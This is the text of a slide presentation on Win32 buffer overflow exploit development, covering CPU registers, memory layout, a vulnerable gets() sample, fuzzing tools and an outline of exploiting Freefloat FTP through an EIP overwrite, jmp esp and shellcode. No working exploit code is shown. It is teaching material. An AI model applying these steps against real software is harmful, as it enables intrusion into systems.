Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

Exploit Development

  • Login to see the comments

  • Be the first to like this

Exploit Development

  1. 1. Exploit Development Win32 Buffer Overflow Exploitation By Kyaw Thiha
  2. 2. Whoami? • Info-sec analyst • Currently working at Kernellix • Ex-team member of mmCERT • Participate some bug bounty programs
  3. 3. Prerequisties Knowledge • Memory stack • CPU Register • Knowledge on assembly language • Buffer overflow attack • Understanding Shellcode
  4. 4. CPU Register General Purpose Registers EAX EBX ECX EDX Segment Registers CS DS SS ES FS GS
  5. 5. CPU Register Index and Pointer Register EFLAGS Registers EDIESI EBP ESP EIP EFLAGS
  6. 6. General Purpose Registers Base register It is used as a base pointer for memory access Gets some interrupt return values EAX EBX ECX EDX Counter register It is used as a loop counter and for shifts Gets some interrupt values Accumulator register.It is used for I/O port access, arithmetic, interrupt calls, etc... Data register It is used for I/O port access, arithmetic, some interruptcalls.
  7. 7. Segment Registers Holds the Data segment that your program accesses. Changing its value might give erronous data. CS DS SS ES FS GP These are extra segment registers available for far pointer addressing like video memory and such. Holds the Stack segment your program uses. Sometimes has the same value as DS.Changing its value can give unpredictable results, mostly data related. Holds the Code segment in which your program runs. Changing its value might make the computer hang.
  8. 8. Index and pointer Registers EDI ESI ESP EBP Data Pointer Register for memory operations Stack Pointer Register Stack Data Pointer Register EIP Next Instruction
  9. 9. EFLAGSRegisters Bit Label Desciption --------------------------- 0 CF Carry flag 2 PF Parity flag 4 AF Auxiliary carry flag 6 ZF Zero flag 7 SF Sign flag 8 TF Trap flag 9 IF Interrupt enable flag 10 DF Direction flag 11 11 OF Overflow flag 12-13 IOPL I/O Priviledge level 14 NT Nested task flag 16 RF Resume flag 17 VM Virtual 8086 mode flag 18 AC Alignment check flag (486+) 19 VIF Virutal interrupt flag 20 VIP Virtual interrupt pending flag 21 ID ID flag Those that are not listed are reserved by Intel.
  10. 10. General Purpose Register EAX AX 31 0 31 01516 AH AL 07815
  11. 11. Program Memory Layout Stack Unused Memory Heap .bss .data .text Used for stroing function Dynamic Memory Unintialize Data Intialize Data Program Code 0xffffffff 0x80961025
  12. 12. What is Buffer Overflow? A buffer overflow condition exists when a program attempts to put more data in a buffer than it can hold or when a program attempts to put data in a memory area past a buffer
  13. 13. What is Buffer Overflow? Environments Affected Almost all known web servers, application servers, and web application environments are susceptible to buffer overflows, the notable exception being environments written in interpreted languages like Java or Python, which are immune to these attacks (except for overflows in the Interpretor itself).
  14. 14. Stack Layout EIP EBP EBX EAX High Memory Low Memory Data Data Instruction
  15. 15. Sample Stack Overflow AAAA AAAA AAAA AAAA High Memory Low Memory Data Data Instruction
  16. 16. Vul code sample  Array int [20]; int [20][5]; int [20][5][3];  Format Strings; printf(), fprint(),sprint(),sprintf()  Overflow strcpy() strcat() sprintf() vsprint() scanf()
  17. 17. Sample Program GetInput() { char buffer[8]; gets(buffer); puts(buffer); }
  18. 18. Sample Program
  19. 19. Demo • Prerequisites • Freefloat FTP • Debugger • Python • Metasploit
  20. 20. Fuzzing – the very first step • Need to know crash point • Need to know vul command
  21. 21. Fuzzing Framework • Spike • Sulley • Peach
  22. 22. Overwrite EIP
  23. 23. Know Crash Point
  24. 24. Know crash point
  25. 25. Program stack Buffer EIP Shellcode NOPs Esp Jmp esp
  26. 26. Control EIP
  27. 27. Shellcode Generate
  28. 28. Final Payload
  29. 29. Final Payload
  30. 30. Thanks ! Question ??